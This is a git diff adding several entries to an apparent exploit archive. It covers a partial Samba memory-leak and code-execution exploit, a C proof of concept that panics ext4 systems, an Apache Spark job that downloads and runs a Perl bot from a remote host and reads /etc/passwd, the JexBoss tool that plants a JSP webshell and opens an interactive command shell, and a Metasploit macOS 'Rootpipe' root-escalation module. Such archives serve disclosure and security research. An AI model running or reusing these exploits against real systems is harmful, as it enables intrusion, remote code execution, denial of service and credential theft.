addr = 0 + i = 0 + offset_str = pack(" 0: + if mem[pos:pos+16] == '\x00'*16: + break + pos -= 16 # sym entry size is 16 bytes + if pos <= 0: + print(' [-] found wrong .dynsym section at {:x}'.format(pos)) + return None + dynsym_offset = pos + print(' [*] found .dynsym section at {:x}'.format(dynsym_offset)) + dynsym = mem[dynsym_offset:] + + # find sock_exec + dynstr, pos = recv_till_string(dynstr, '\x00sock_exec\x00') + print(' [*] found sock_exec string at {:x}'.format(pos+1)) + sock_exec_offset = lookup_dynsym(dynsym, pos+1) + print(' [*] sock_exec offset {:x}'.format(sock_exec_offset)) + + #info['mem'] = mem # smbd data before .dynsym section + info['dynsym'] = dynsym + info['dynstr'] = dynstr # incomplete section + info['sock_exec_addr'] = info['smbd_addr']+sock_exec_offset + print(' [+] sock_exec addr: {:x}'.format(info['sock_exec_addr'])) + + # Note: can continuing memory dump to find ROP + + force_dce_disconnect() + +######## +# code execution +######## +def call_sock_exec(info): + prefix_len = addr2utf_prefix(info['sock_exec_addr']) + if prefix_len == 3: + return False # too bad... cannot call + if prefix_len == 2: + prefix_len = 0 + fake_talloc_chunk_exec = pack(" +#include +#include +#include +#include +#include +#include + +#define EXPLOIT_NAME "cve-2014-7822" +#define EXPLOIT_TYPE DOS + +#define JUNK_SIZE 30000 + +/* ----------------------- functions ----------------------------*/ + + +/* Useful: + * ++============+===============================+===============================+ +| \ File flag| | | +| \ | !EXT4_EXTENTS_FL | EXT4_EXTETNS_FL | +|Fs Features\| | | ++------------+-------------------------------+-------------------------------+ +| !extent | write: 2194719883264 | write: -------------- | +| | seek: 2199023251456 | seek: -------------- | ++------------+-------------------------------+-------------------------------+ +| extent | write: 4402345721856 | write: 17592186044415 | +| | seek: 17592186044415 | seek: 17592186044415 | ++------------+-------------------------------+-------------------------------+ +*/ + + +/** + * Poc for cve_2014_7822 vulnerability + */ +int main() +{ + int pipefd[2]; + int result; + int in_file; + int out_file; + int zulHandler; + loff_t viciousOffset = 0; + + char junk[JUNK_SIZE] ={0}; + + result = pipe(pipefd); + + // Create and clear zug.txt and zul.txt files + system("cat /dev/null > zul.txt"); + system("cat /dev/null > zug.txt"); + + // Fill zul.txt with A + zulHandler = open("zul.txt", O_RDWR); + memset(junk,'A',JUNK_SIZE); + write(zulHandler, junk, JUNK_SIZE); + close(zulHandler); + + //put content of zul.txt in pipe + viciousOffset = 0; + in_file = open("zul.txt", O_RDONLY); + result = splice(in_file, 0, pipefd[1], NULL, JUNK_SIZE, SPLICE_F_MORE | SPLICE_F_MOVE); + close(in_file); + + + // Put content of pipe in zug.txt + out_file = open("zug.txt", O_RDWR); + viciousOffset = 118402345721856; // Create 108 tera byte file... can go up as much as false 250 peta byte ext4 file size!! + printf("[cve_2014_7822]: ViciousOffset = %lu\n", (unsigned long)viciousOffset); + + result = splice(pipefd[0], NULL, out_file, &viciousOffset, JUNK_SIZE , SPLICE_F_MORE | SPLICE_F_MOVE); //8446744073709551615 + if (result == -1) + { + printf("[cve_2014_7822 error]: %d - %s\n", errno, strerror(errno)); + exit(1); + } + close(out_file); + + close(pipefd[0]); + close(pipefd[1]); + + + //Open zug.txt + in_file = open("zug.txt", O_RDONLY); + close(in_file); + + printf("[cve_2014_7822]: POC triggered, ... system will panic after some time\n"); + + return 0; +} diff --git a/platforms/linux/remote/36562.txt b/platforms/linux/remote/36562.txt new file mode 100755 index 000000000..700c6ab6f --- /dev/null +++ b/platforms/linux/remote/36562.txt @@ -0,0 +1,63 @@ +# Exploit Title: Arbitary Code Execution in Apache Spark Cluster +# Date: 23/03/2015 +# Exploit Author: AkhlD (AkhilDas) CodeBreach.in +# Vendor Homepage: https://spark.apache.org/ +# Software Link: https://spark.apache.org/downloads.html +# Version: All (0.0.x, 1.1.x, 1.2.x, 1.3.x) +# Tested on: 1.2.1 + +# Credits: Mayur Rustagi (@mayur_rustagi), Patrick Wendel (@pwendell) for +reviewing. +# Reference(s) : +http://codebreach.in/blog/2015/03/arbitary-code-execution-in-unsecured-apache-spark-cluster/ +# Exploit URL : https://github.com/akhld/spark-exploit/ + +# Spark clusters which are not secured with proper firewall can be taken +over easily (Since it does not have +# any authentication mechanism), this exploit simply runs arbitarty codes +over the cluster. +# All you have to do is, find a vulnerable Spark cluster (usually runs on +port 7077) add that host to your +# hosts list so that your system will recognize it (here its +spark-b-akhil-master pointing +# to 54.155.61.87 in my /etc/hosts) and submit your Spark Job with arbitary +codes that you want to execute. + +# Language: Scala + + +import org.apache.spark.{SparkContext, SparkConf} + +/** + * Created by akhld on 23/3/15. + */ + +object Exploit { + def main(arg: Array[String]) { + val sconf = new SparkConf() + .setMaster("spark://spark-b-akhil-master:7077") // Set this to the +vulnerable host URI + .setAppName("Exploit") + .set("spark.cores.max", "2") + .set("spark.executor.memory", "2g") + .set("spark.driver.host","hacked.work") // Set this to your host from +where you launch the attack + + val sc = new SparkContext(sconf) + sc.addJar("target/scala-2.10/spark-exploit_2.10-1.0.jar") + + val exploit = sc.parallelize(1 to 1).map(x=>{ + //Replace these with whatever you want to get executed + val x = "wget https://mallicioushost/mal.pl -O bot.pl".! + val y = "perl bot.pl".! + scala.io.Source.fromFile("/etc/passwd").mkString + }) + exploit.collect().foreach(println) + } +} + + + + +Thanks +Best Regards diff --git a/platforms/multiple/webapps/36575.py b/platforms/multiple/webapps/36575.py new file mode 100755 index 000000000..57dbd3b7c --- /dev/null +++ b/platforms/multiple/webapps/36575.py @@ -0,0 +1,440 @@ +# coding: utf-8 +# JexBoss v1.0. @autor: João Filho Matos Figueiredo (joaomatosf@gmail.com) +# Updates: https://github.com/joaomatosf/jexboss +# Free for distribution and modification, but the authorship should be preserved. + + +import httplib, sys, urllib, os, time +from urllib import urlencode + +RED = '\x1b[91m' +RED1 = '\033[31m' +BLUE = '\033[94m' +GREEN = '\033[32m' +BOLD = '\033[1m' +NORMAL = '\033[0m' +ENDC = '\033[0m' + +def getHost(url): + tokens = url.split("://") + if len(tokens) == 2: #foi fornecido protocolo + return tokens[1].split(":")[0] + else: + return tokens.split(":")[0] + +def getProtocol(url): + tokens = url.split("://") + if tokens[0] == "https": + return "https" + else: + return "http" + +def getPort(url): + token = url[6:].split(":") + if len(token) == 2: + return token[1] + elif getProtocol(url) == "https": + return 443 + else: + return 80 + +def getConnection(url): + if getProtocol(url) == "https": + return httplib.HTTPSConnection(getHost(url), getPort(url)) + else: + return httplib.HTTPConnection(getHost(url), getPort(url)) + + +def getSuccessfully(url, path): + result = 404 + time.sleep(5) + conn = getConnection(url) + conn.request("GET", path) + result = conn.getresponse().status + if result == 404: + conn.close() + time.sleep(7) + conn = getConnection(url) + conn.request("GET", path) + result = conn.getresponse().status + conn.close() + return result + +def checkVul(url): + + print ( GREEN +" ** Checking Host: %s **\n" %url ) + + path = { "jmx-console" : "/jmx-console/HtmlAdaptor?action=inspectMBean&name=jboss.system:type=ServerInfo", + "web-console" : "/web-console/ServerInfo.jsp", + "JMXInvokerServlet" : "/invoker/JMXInvokerServlet"} + + for i in path.keys(): + try: + print GREEN + " * Checking %s: \t" %i + ENDC, + conn = getConnection(url) + conn.request("HEAD", path[i]) + path[i] = conn.getresponse().status + if path[i] == 200 or path[i] == 500: + print RED + "[ VULNERABLE ]" + ENDC + else: print GREEN + "[ OK ]" + conn.close() + except: + print RED + "\n * An error ocurred while contaction the host %s\n" %url + ENDC + path[i] = 505 + + return path + +def autoExploit(url, type): + + # exploitJmxConsoleFileRepository: tested and working in jboss 4 and 5 + # exploitJmxConsoleMainDeploy: tested and working in jboss 4 and 6 + # exploitWebConsoleInvoker: tested and working in jboss 4 + # exploitJMXInvokerFileRepository: tested and working in jboss 4 and 5 + + print GREEN + ("\n * Sending exploit code to %s. Wait...\n" %url) + result = 505 + if type == "jmx-console": + result = exploitJmxConsoleFileRepository(url) + if result != 200 and result != 500: + result = exploitJmxConsoleMainDeploy(url) + elif type == "web-console": + result = exploitWebConsoleInvoker(url) + elif type == "JMXInvokerServlet": + result = exploitJMXInvokerFileRepository(url) + + if result == 200 or result == 500: + print GREEN + " * Successfully deployed code! Starting command shell, wait...\n" + ENDC + shell_http(url, type) + else: + print (RED + "\n * Could not exploit the flaw automatically. Exploitation requires manual analysis...\n" + " Waiting for 7 seconds...\n "+ ENDC) + time.sleep(7) + +def shell_http(url, type): + if type == "jmx-console" or type == "web-console": + path = '/jbossass/jbossass.jsp?' + elif type == "JMXInvokerServlet": + path = '/shellinvoker/shellinvoker.jsp?' + + conn = getConnection(url) + conn.request("GET", path) + conn.close() + time.sleep(7) + resp = "" + #clear() + print " * - - - - - - - - - - - - - - - - - - - - LOL - - - - - - - - - - - - - - - - - - - - * \n" + print RED+" * "+url+": \n"+ENDC + headers = {"User-Agent" : "jexboss"} + for cmd in ['uname -a', 'cat /etc/issue', 'id']: + conn = getConnection(url) + cmd = urlencode({"ppp": cmd}) + conn.request("GET", path+cmd, '', headers) + resp += " "+conn.getresponse().read().split(">")[1] + print resp, + + while 1: + print BLUE + "[Type commands or \"exit\" to finish]" + cmd=raw_input("Shell> "+ENDC) + #print ENDC + if cmd == "exit": + break + conn = getConnection(url) + cmd = urlencode({"ppp": cmd}) + conn.request("GET", path+cmd, '', headers) + resp = conn.getresponse() + if resp.status == 404: + print RED+ " * Error contacting the commando shell. Try again later..." + conn.close() + continue + stdout = "" + try: + stdout = resp.read().split("pre>")[1] + except: + print RED+ " * Error contacting the commando shell. Try again later..." + if stdout.count("An exception occurred processing JSP page") == 1: + print RED + " * Error executing command \"%s\". " %cmd.split("=")[1] + ENDC + else: print stdout, + conn.close() + +def exploitJmxConsoleMainDeploy(url): + # MainDeployer + # does not work in jboss5 (bug in jboss5) + # shell in link + # /jmx-console/HtmlAdaptor + jsp = "http://www.joaomatosf.com/rnp/jbossass.war" + payload =( "/jmx-console/HtmlAdaptor?action=invokeOp&name=jboss.system:service" + "=MainDeployer&methodIndex=19&arg0="+jsp) + print ( GREEN+ "\n * Info: This exploit will force the server to deploy the webshell " + "\n available on: "+jsp +ENDC) + conn = getConnection(url) + conn.request("HEAD", payload) + result = conn.getresponse().status + conn.close() + return getSuccessfully(url, "/jbossass/jbossass.jsp") + +def exploitJmxConsoleFileRepository(url): + # DeploymentFileRepository + # tested and work in jboss4, 5. + # doest not work in jboss6 + # shell jsp + # /jmx-console/HtmlAdaptor + jsp =("%3C%25%40%20%70%61%67%65%20%69%6D%70%6F%72%74%3D%22%6A%61%76%61" + "%2E%75%74%69%6C%2E%2A%2C%6A%61%76%61%2E%69%6F%2E%2A%22%25%3E%3C" + "%70%72%65%3E%3C%25%20%69%66%20%28%72%65%71%75%65%73%74%2E%67%65" + "%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29%20%21%3D%20" + "%6E%75%6C%6C%20%26%26%20%72%65%71%75%65%73%74%2E%67%65%74%48%65" + "%61%64%65%72%28%22%75%73%65%72%2D%61%67%65%6E%74%22%29%2E%65%71" + "%75%61%6C%73%28%22%6A%65%78%62%6F%73%73%22%29%29%20%7B%20%50%72" + "%6F%63%65%73%73%20%70%20%3D%20%52%75%6E%74%69%6D%65%2E%67%65%74" + "%52%75%6E%74%69%6D%65%28%29%2E%65%78%65%63%28%72%65%71%75%65%73" + "%74%2E%67%65%74%50%61%72%61%6D%65%74%65%72%28%22%70%70%70%22%29" + "%29%3B%20%44%61%74%61%49%6E%70%75%74%53%74%72%65%61%6D%20%64%69" + "%73%20%3D%20%6E%65%77%20%44%61%74%61%49%6E%70%75%74%53%74%72%65" + "%61%6D%28%70%2E%67%65%74%49%6E%70%75%74%53%74%72%65%61%6D%28%29" + "%29%3B%20%53%74%72%69%6E%67%20%64%69%73%72%20%3D%20%64%69%73%2E" + "%72%65%61%64%4C%69%6E%65%28%29%3B%20%77%68%69%6C%65%20%28%20%64" + "%69%73%72%20%21%3D%20%6E%75%6C%6C%20%29%20%7B%20%6F%75%74%2E%70" + "%72%69%6E%74%6C%6E%28%64%69%73%72%29%3B%20%64%69%73%72%20%3D%20" + "%64%69%73%2E%72%65%61%64%4C%69%6E%65%28%29%3B%20%7D%20%7D%25%3E" ) + + payload =("/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.admin:service=" + "DeploymentFileRepository&methodName=store&argType=java.lang.String&arg0=" + "jbossass.war&argType=java.lang.String&arg1=jbossass&argType=java.lang.St" + "ring&arg2=.jsp&argType=java.lang.String&arg3="+jsp+"&argType=boolean&arg4=True") + + conn = getConnection(url) + conn.request("HEAD", payload) + result = conn.getresponse().status + conn.close() + return getSuccessfully(url, "/jbossass/jbossass.jsp") + +def exploitJMXInvokerFileRepository(url): + # tested and work in jboss4, 5 + # MainDeploy, shell in data + # /invoker/JMXInvokerServlet + payload = ( "\xac\xed\x00\x05\x73\x72\x00\x29\x6f\x72\x67\x2e\x6a\x62\x6f\x73" + "\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d\x61\x72" + "\x73\x68\x61\x6c\x6c\x65\x64\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f" + "\x6e\xf6\x06\x95\x27\x41\x3e\xa4\xbe\x0c\x00\x00\x78\x70\x70\x77" + "\x08\x78\x94\x98\x47\xc1\xd0\x53\x87\x73\x72\x00\x11\x6a\x61\x76" + "\x61\x2e\x6c\x61\x6e\x67\x2e\x49\x6e\x74\x65\x67\x65\x72\x12\xe2" + "\xa0\xa4\xf7\x81\x87\x38\x02\x00\x01\x49\x00\x05\x76\x61\x6c\x75" + "\x65\x78\x72\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4e" + "\x75\x6d\x62\x65\x72\x86\xac\x95\x1d\x0b\x94\xe0\x8b\x02\x00\x00" + "\x78\x70\xe3\x2c\x60\xe6\x73\x72\x00\x24\x6f\x72\x67\x2e\x6a\x62" + "\x6f\x73\x73\x2e\x69\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x4d" + "\x61\x72\x73\x68\x61\x6c\x6c\x65\x64\x56\x61\x6c\x75\x65\xea\xcc" + "\xe0\xd1\xf4\x4a\xd0\x99\x0c\x00\x00\x78\x70\x7a\x00\x00\x02\xc6" + "\x00\x00\x02\xbe\xac\xed\x00\x05\x75\x72\x00\x13\x5b\x4c\x6a\x61" + "\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90" + "\xce\x58\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x04" + "\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e\x6d\x61\x6e\x61\x67\x65" + "\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x0f" + "\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00\x78\x70\x74\x00\x2c\x6a" + "\x62\x6f\x73\x73\x2e\x61\x64\x6d\x69\x6e\x3a\x73\x65\x72\x76\x69" + "\x63\x65\x3d\x44\x65\x70\x6c\x6f\x79\x6d\x65\x6e\x74\x46\x69\x6c" + "\x65\x52\x65\x70\x6f\x73\x69\x74\x6f\x72\x79\x78\x74\x00\x05\x73" + "\x74\x6f\x72\x65\x75\x71\x00\x7e\x00\x00\x00\x00\x00\x05\x74\x00" + "\x10\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72\x2e\x77\x61" + "\x72\x74\x00\x0c\x73\x68\x65\x6c\x6c\x69\x6e\x76\x6f\x6b\x65\x72" + "\x74\x00\x04\x2e\x6a\x73\x70\x74\x01\x79\x3c\x25\x40\x20\x70\x61" + "\x67\x65\x20\x69\x6d\x70\x6f\x72\x74\x3d\x22\x6a\x61\x76\x61\x2e" + "\x75\x74\x69\x6c\x2e\x2a\x2c\x6a\x61\x76\x61\x2e\x69\x6f\x2e\x2a" + "\x22\x25\x3e\x3c\x70\x72\x65\x3e\x3c\x25\x69\x66\x28\x72\x65\x71" + "\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d\x65\x74\x65" + "\x72\x28\x22\x70\x70\x70\x22\x29\x20\x21\x3d\x20\x6e\x75\x6c\x6c" + "\x20\x26\x26\x20\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x48" + "\x65\x61\x64\x65\x72\x28\x22\x75\x73\x65\x72\x2d\x61\x67\x65\x6e" + "\x74\x22\x29\x2e\x65\x71\x75\x61\x6c\x73\x28\x22\x6a\x65\x78\x62" + "\x6f\x73\x73\x22\x29\x20\x29\x20\x7b\x20\x50\x72\x6f\x63\x65\x73" + "\x73\x20\x70\x20\x3d\x20\x52\x75\x6e\x74\x69\x6d\x65\x2e\x67\x65" + "\x74\x52\x75\x6e\x74\x69\x6d\x65\x28\x29\x2e\x65\x78\x65\x63\x28" + "\x72\x65\x71\x75\x65\x73\x74\x2e\x67\x65\x74\x50\x61\x72\x61\x6d" + "\x65\x74\x65\x72\x28\x22\x70\x70\x70\x22\x29\x29\x3b\x20\x44\x61" + "\x74\x61\x49\x6e\x70\x75\x74\x53\x74\x72\x65\x61\x6d\x20\x64\x69" + "\x73\x20\x3d\x20\x6e\x65\x77\x20\x44\x61\x74\x61\x49\x6e\x70\x75" + "\x74\x53\x74\x72\x65\x61\x6d\x28\x70\x2e\x67\x65\x74\x49\x6e\x70" + "\x75\x74\x53\x74\x72\x65\x61\x6d\x28\x29\x29\x3b\x20\x53\x74\x72" + "\x69\x6e\x67\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69\x73\x2e\x72" + "\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x77\x68\x69\x6c\x65" + "\x20\x28\x20\x64\x69\x73\x72\x20\x21\x3d\x20\x6e\x75\x6c\x6c\x20" + "\x29\x20\x7b\x20\x6f\x75\x74\x2e\x70\x72\x69\x6e\x74\x6c\x6e\x28" + "\x64\x69\x73\x72\x29\x3b\x20\x64\x69\x73\x72\x20\x3d\x20\x64\x69" + "\x73\x2e\x72\x65\x61\x64\x4c\x69\x6e\x65\x28\x29\x3b\x20\x7d\x20" + "\x7d\x25\x3e\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67" + "\x2e\x42\x6f\x6f\x6c\x65\x61\x6e\xcd\x20\x72\x80\xd5\x9c\xfa\xee" + "\x02\x00\x01\x5a\x00\x05\x76\x61\x6c\x75\x65\x78\x70\x01\x75\x72" + "\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74" + "\x72\x69\x6e\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00" + "\x78\x70\x00\x00\x00\x05\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61" + "\x6e\x67\x2e\x53\x74\x72\x69\x6e\x67\x71\x00\x7e\x00\x0f\x71\x00" + "\x7e\x00\x0f\x71\x00\x7e\x00\x0f\x74\x00\x07\x62\x6f\x6f\x6c\x65" + "\x61\x6e\x63\x79\xb8\x87\x78\x77\x08\x00\x00\x00\x00\x00\x00\x00" + "\x01\x73\x72\x00\x22\x6f\x72\x67\x2e\x6a\x62\x6f\x73\x73\x2e\x69" + "\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\x2e\x49\x6e\x76\x6f\x63\x61" + "\x74\x69\x6f\x6e\x4b\x65\x79\xb8\xfb\x72\x84\xd7\x93\x85\xf9\x02" + "\x00\x01\x49\x00\x07\x6f\x72\x64\x69\x6e\x61\x6c\x78\x70\x00\x00" + "\x00\x04\x70\x78") + conn = getConnection(url) + headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.invocation.MarshalledValue", + "Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"} + conn.request("POST", "/invoker/JMXInvokerServlet", payload, headers) + response = conn.getresponse() + result = response.status + if result == 401: + print " Retrying..." + conn.close() + conn.request("HEAD", "/invoker/JMXInvokerServlet", payload, headers) + response = conn.getresponse() + result = response.status + if response.read().count("Failed") > 0: + result = 505 + conn.close + return getSuccessfully(url, "/shellinvoker/shellinvoker.jsp") + +def exploitWebConsoleInvoker(url): + # does not work in jboss5 (bug in jboss5) + # MainDeploy, shell in link + # /web-console/Invoker + #jsp = "http://www.joaomatosf.com/rnp/jbossass.war" + #jsp = "\\x".join("{:02x}".format(ord(c)) for c in jsp) + #jsp = "\\x" + jsp + payload = ( "\xac\xed\x00\x05\x73\x72\x00\x2e\x6f\x72\x67\x2e" + "\x6a\x62\x6f\x73\x73\x2e\x63\x6f\x6e\x73\x6f\x6c\x65\x2e\x72\x65" + "\x6d\x6f\x74\x65\x2e\x52\x65\x6d\x6f\x74\x65\x4d\x42\x65\x61\x6e" + "\x49\x6e\x76\x6f\x63\x61\x74\x69\x6f\x6e\xe0\x4f\xa3\x7a\x74\xae" + "\x8d\xfa\x02\x00\x04\x4c\x00\x0a\x61\x63\x74\x69\x6f\x6e\x4e\x61" + "\x6d\x65\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f" + "\x53\x74\x72\x69\x6e\x67\x3b\x5b\x00\x06\x70\x61\x72\x61\x6d\x73" + "\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x4f" + "\x62\x6a\x65\x63\x74\x3b\x5b\x00\x09\x73\x69\x67\x6e\x61\x74\x75" + "\x72\x65\x74\x00\x13\x5b\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67" + "\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x10\x74\x61\x72\x67\x65" + "\x74\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x74\x00\x1d\x4c\x6a" + "\x61\x76\x61\x78\x2f\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2f" + "\x4f\x62\x6a\x65\x63\x74\x4e\x61\x6d\x65\x3b\x78\x70\x74\x00\x06" + "\x64\x65\x70\x6c\x6f\x79\x75\x72\x00\x13\x5b\x4c\x6a\x61\x76\x61" + "\x2e\x6c\x61\x6e\x67\x2e\x4f\x62\x6a\x65\x63\x74\x3b\x90\xce\x58" + "\x9f\x10\x73\x29\x6c\x02\x00\x00\x78\x70\x00\x00\x00\x01\x74\x00" + "\x2a" + #link + "\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e\x6a\x6f\x61\x6f\x6d\x61" + "\x74\x6f\x73\x66\x2e\x63\x6f\x6d\x2f\x72\x6e\x70\x2f\x6a\x62\x6f" + "\x73\x73\x61\x73\x73\x2e\x77\x61\x72" + #end + "\x75\x72\x00\x13\x5b" + "\x4c\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e\x53\x74\x72\x69\x6e" + "\x67\x3b\xad\xd2\x56\xe7\xe9\x1d\x7b\x47\x02\x00\x00\x78\x70\x00" + "\x00\x00\x01\x74\x00\x10\x6a\x61\x76\x61\x2e\x6c\x61\x6e\x67\x2e" + "\x53\x74\x72\x69\x6e\x67\x73\x72\x00\x1b\x6a\x61\x76\x61\x78\x2e" + "\x6d\x61\x6e\x61\x67\x65\x6d\x65\x6e\x74\x2e\x4f\x62\x6a\x65\x63" + "\x74\x4e\x61\x6d\x65\x0f\x03\xa7\x1b\xeb\x6d\x15\xcf\x03\x00\x00" + "\x78\x70\x74\x00\x21\x6a\x62\x6f\x73\x73\x2e\x73\x79\x73\x74\x65" + "\x6d\x3a\x73\x65\x72\x76\x69\x63\x65\x3d\x4d\x61\x69\x6e\x44\x65" + "\x70\x6c\x6f\x79\x65\x72\x78") + conn = getConnection(url) + headers = { "Content-Type" : "application/x-java-serialized-object; class=org.jboss.console.remote.RemoteMBeanInvocation", + "Accept" : "text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2"} + conn.request("POST", "/web-console/Invoker", payload, headers) + response = conn.getresponse() + result = response.status + if result == 401: + print " Retrying..." + conn.close() + conn.request("HEAD", "/web-console/Invoker", payload, headers) + response = conn.getresponse() + result = response.status + conn.close + return getSuccessfully(url, "/jbossass/jbossass.jsp") + + +def clear(): + if os.name == 'posix': + os.system('clear') + elif os.name == ('ce', 'nt', 'dos'): + os.system('cls') + +def checkArgs(args): + if len(args) < 2 or args[1].count('.') < 1: + return 1,"You must provide the host name or IP address you want to test." + elif len(args[1].split('://')) == 1: + return 2, 'Changing address "%s" to "http://%s"' %(args[1], args[1]) + elif args[1].count('http') == 1 and args[1].count('.') > 1: + return 0, "" + else: + return 1, 'Parâmetro inválido' + +def banner(): + clear() + print (RED1+"\n * --- JexBoss: Jboss verify and EXploitation Tool --- *\n" + " | |\n" + " | @author: João Filho Matos Figueiredo |\n" + " | @contact: joaomatosf@gmail.com |\n" + " | |\n" + " | @update: https://github.com/joaomatosf/jexboss |\n" + " #______________________________________________________#\n\n" ) + +banner() +# check python version +if sys.version_info[0] == 3: + print (RED + "\n * Not compatible with version 3 of python.\n" + " Please run it with version 2.7 or lower.\n\n" + +BLUE+" * Example:\n" + " python2.7 " + sys.argv[0]+ " https://site.com\n\n"+ENDC ) + sys.exit(1) + +# check Args +status, message = checkArgs(sys.argv) +if status == 0: + url = sys.argv[1] +elif status == 1: + print RED + "\n * Error: %s" %message + print BLUE + "\n Example:\n python %s https://site.com.br\n" %sys.argv[0] + ENDC + sys.exit(status) +elif status == 2: + url = ''.join(['http://',sys.argv[1]]) + +# check vulnerabilities +mapResult = checkVul(url) + +# performs exploitation +for i in ["jmx-console", "web-console", "JMXInvokerServlet"]: + if mapResult[i] == 200 or mapResult[i] == 500: + print BLUE + ("\n\n * Do you want to try to run an automated exploitation via \""+BOLD+i+NORMAL+"\" ?\n" + " This operation will provide a simple command shell to execute commands on the server..\n" + +RED+" Continue only if you have permission!" +ENDC) + if raw_input(" yes/NO ? ").lower() == "yes": + autoExploit(url, i) + +# resume results +if mapResult.values().count(200) > 0: + banner() + print RED+ " Results: potentially compromised server!" +ENDC + print (GREEN+" * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n\n" + " Recommendations: \n" + " - Remove web consoles and services that are not used, eg:\n" + " $ rm web-console.war\n" + " $ rm http-invoker.sar\n" + " $ rm jmx-console.war\n" + " $ rm jmx-invoker-adaptor-server.sar\n" + " $ rm admin-console.war\n" + " - Use a reverse proxy (eg. nginx, apache, f5)\n" + " - Limit access to the server only via reverse proxy (eg. DROP INPUT POLICY)\n" + " - Search vestiges of exploitation within the directories \"deploy\" or \"management\".\n\n" + " References:\n" + " [1] - https://developer.jboss.org/wiki/SecureTheJmxConsole\n" + " [2] - https://issues.jboss.org/secure/attachment/12313982/jboss-securejmx.pdf\n" + "\n" + " - If possible, discard this server!\n\n" + " * - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -*\n" ) +elif mapResult.values().count(505) == 0: + print ( GREEN+ "\n\n * Results: \n" + " The server is not vulnerable to bugs tested ... :D\n\n" + ENDC) + +# infos +print (ENDC+" * Info: review, suggestions, updates, etc: \n" + " https://github.com/joaomatosf/jexboss\n" + " joaomatosf@gmail.com\n") + +print ENDC + diff --git a/platforms/osx/local/36745.rb b/platforms/osx/local/36745.rb new file mode 100755 index 000000000..09fad22cf --- /dev/null +++ b/platforms/osx/local/36745.rb @@ -0,0 +1,114 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Local + + Rank = GreatRanking + + include Msf::Post::OSX::System + include Msf::Exploit::EXE + include Msf::Exploit::FileDropper + + def initialize(info = {}) + super(update_info(info, + 'Name' => 'Mac OS X "Rootpipe" Privilege Escalation', + 'Description' => %q{ + This module exploits a hidden backdoor API in Apple's Admin framework on + Mac OS X to escalate privileges to root. Dubbed "Rootpipe." + + Tested on Yosemite 10.10.2 and should work on previous versions. + + The patch for this issue was not backported to older releases. + + Note: you must run this exploit as an admin user to escalate to root. + }, + 'Author' => [ + 'Emil Kvarnhammar', # Vulnerability discovery and PoC + 'joev', # Copy/paste monkey + 'wvu' # Meta copy/paste monkey + ], + 'References' => [ + ['CVE', '2015-1130'], + ['OSVDB', '114114'], + ['EDB', '36692'], + ['URL', 'https://truesecdev.wordpress.com/2015/04/09/hidden-backdoor-api-to-root-privileges-in-apple-os-x/'] + ], + 'DisclosureDate' => 'Apr 9 2015', + 'License' => MSF_LICENSE, + 'Platform' => 'osx', + 'Arch' => ARCH_X86_64, + 'SessionTypes' => ['shell'], + 'Targets' => [ + ['Mac OS X 10.9-10.10.2', {}] + ], + 'DefaultTarget' => 0, + 'DefaultOptions' => { + 'PAYLOAD' => 'osx/x64/shell_reverse_tcp', + 'CMD' => '/bin/zsh' + } + )) + + register_options([ + OptString.new('PYTHON', [true, 'Python executable', '/usr/bin/python']), + OptString.new('WritableDir', [true, 'Writable directory', '/.Trashes']) + ]) + end + + def check + (ver? && admin?) ? Exploit::CheckCode::Vulnerable : Exploit::CheckCode::Safe + end + + def exploit + print_status("Writing exploit to `#{exploit_file}'") + write_file(exploit_file, python_exploit) + register_file_for_cleanup(exploit_file) + + print_status("Writing payload to `#{payload_file}'") + write_file(payload_file, binary_payload) + register_file_for_cleanup(payload_file) + + print_status('Executing exploit...') + cmd_exec(sploit) + print_status('Executing payload...') + cmd_exec(payload_file) + end + + def ver? + Gem::Version.new(get_sysinfo['ProductVersion']).between?( + Gem::Version.new('10.9'), Gem::Version.new('10.10.2') + ) + end + + def admin? + cmd_exec('groups | grep -wq admin && echo true') == 'true' + end + + def sploit + "#{datastore['PYTHON']} #{exploit_file} #{payload_file} #{payload_file}" + end + + def python_exploit + File.read(File.join( + Msf::Config.data_directory, 'exploits', 